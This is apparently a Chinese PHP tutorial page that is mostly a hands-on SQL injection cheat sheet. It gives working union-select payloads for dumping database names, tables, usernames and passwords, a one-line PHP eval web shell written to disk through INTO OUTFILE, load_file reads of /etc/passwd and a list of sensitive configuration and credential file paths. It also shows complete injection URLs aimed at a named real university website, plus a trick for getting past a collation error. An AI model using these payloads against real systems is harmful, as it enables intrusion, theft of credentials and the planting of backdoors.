PHP常见的几种攻击方式实例小结
本文实例总结了php常见的几种攻击方式。分享给大家供大家参考,具体如下:
1.sql injection(sql注入)
①.暴字段长度 order by num/*
②.匹配字段 and 1=1 union select 1,2,3,4,5…….n/*
③.暴露字段位置 and 1=2 union select 1,2,3,4,5…..n/*
④.利用内置函数暴数据库信息
version() database() user()
不用猜解可用字段暴数据库信息(有些网站不适用):
and 1=2 union all select version() /*
and 1=2 union all select database() /*
and 1=2 union all select user() /*
操作系统信息:
and 1=2 union all select @@global.version_compile_os from mysql.user /*
数据库权限:
and ord(mid(user(),1,1))=114 /* 返回正常说明为root
暴库 (mysql>5.0)
mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息 and 1=2 union select 1,2,3,schema_name,5,6,7,8,9,10 from information_schema.schemata limit 0,1
猜表
and 1=2 union select 1,2,3,table_name,5,6,7,8,9,10 from information_schema.tables where table_schema=数据库(十六进制) limit 0(开始的记录,0为第一个开始记录),1(显示1条记录)—
猜字段
and 1=2 union select 1,2,3,column_name,5,6,7,8,9,10 from information_schema.columns where table_name=表名(十六进制)limit 0,1
暴密码
and 1=2 union select 1,2,3,用户名段,5,6,7,密码段,8,9 from 表名 limit 0,1
高级用法(一个可用字段显示两个数据内容):union select 1,2,3concat(用户名段,0x3c,密码段),5,6,7,8,9 from 表名 limit 0,1
直接写马(root权限)
条件:
①、知道站点物理路径
②、有足够大的权限(可以用select …. from mysql.user测试)
③、magic_quotes_gpc()=off
select '<?php eval($_post[cmd])?>' into outfile '物理路径' and 1=2 union all select 一句话hex值 into outfile '路径'
load_file() 常用路径:
1、replace(load_file(0×2f6574632f706173737764),0×3c,0×20)
2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一个php文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
3、load_file(char(47)) 可以列出freebsd,sunos系统根目录
4、/etc tpd/conf tpd.conf或/usr/local/apche/conf tpd.conf 查看linux apache虚拟主机配置文件
5、c:\program files\apache group\apache\conf \httpd.conf 或c:\apache\conf \httpd.conf 查看windows系统apache文件
6、c:/resin-3.0.14/conf/resin.conf 查看jsp开发的网站 resin文件配置信息.
7、c:/resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的jsp虚拟主机
8、d:\apache\apache2\conf\httpd.conf
9、c:\program files\mysql\my.ini
10、../themes/darkblue_orange/layout.inc.php phpmyadmin 爆路径
11、 c:\windows\system32\inetsrv\metabase.xml 查看iis的虚拟主机配置文件
12、 /usr/local/resin-3.0.22/conf/resin.conf 针对3.0.22的resin配置文件查看
13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
14 、/usr/local/app/apache2/conf/extra tpd-vhosts.conf apashe虚拟主机查看
15、 /etc/sysconfig/iptables 本看防火墙策略
16 、usr/local/app/php5 b/php.ini php 的相当设置
17 、/etc/my.cnf mysql的配置文件
18、 /etc/redhat-release 红帽子的系统版本
19 、c:\mysql\data\mysql\user.myd 存在mysql系统中的用户密码
20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看ip.
21、/usr/local/app/php5 b/php.ini //php相关设置
22、/usr/local/app/apache2/conf/extra tpd-vhosts.conf //虚拟网站设置
23、c:\program files\rhinosoft.com\serv-u\servudaemon.ini
24、c:\windows\my.ini
25、c:\boot.ini
手工注射时出现的问题:
当注射后页面显示:
illegal mix of collations (latin1_swedish_ci,implicit) and (utf8_general_ci,implicit) for operation 'union'
如:http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?id=13%20and%201=2%20union%20select%201,load_file(0x433a5c626f6f742e696e69),3,4,user()%20
这是由于前后编码不一致造成的,
解决方法:在参数前加上 unhex(hex(参数))
就可以了。上面的url就可以改为:
http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?id=13%20and%201=2%20union%20select%201,unhex(hex(load_file(0x433a5c626f6f742e696e69))),3,4,unhex(hex(user()))%20
既可以继续注射了。。。
2.xss (cross site scripting)(跨站脚本攻击)
3.source code revelation(源代码暴露)
可以用php.ini或者htaccess控制
<files ~ "\.inc$"> order allow,deny deny from all </files>
4.remote file inclusion(远程文件包含漏洞)
<?php $file = $_get['file']; // “ ../../etc/passwd\0” if(file_exists('/home/wwwrun' . $file . '.php')){xxx} ?>
5.session hijacking(session劫持)
6.cross site request forgery(跨站请求伪造)
7.directory traversal(目录跨越)
更多关于php相关内容感兴趣的读者可查看本站专题:《php程序设计安全教程》、《php安全过滤技巧总结》、《php运算与运算符用法总结》、《php基本语法入门教程》、《php面向对象程序设计入门教程》、《php字符串(string)用法总结》、《php+mysql数据库操作入门教程》及《php常见数据库操作技巧汇总》
希望本文所述对大家php程序设计有所帮助。
上一篇: iOS实现转盘效果
下一篇: PHP实现字母数字混合验证码功能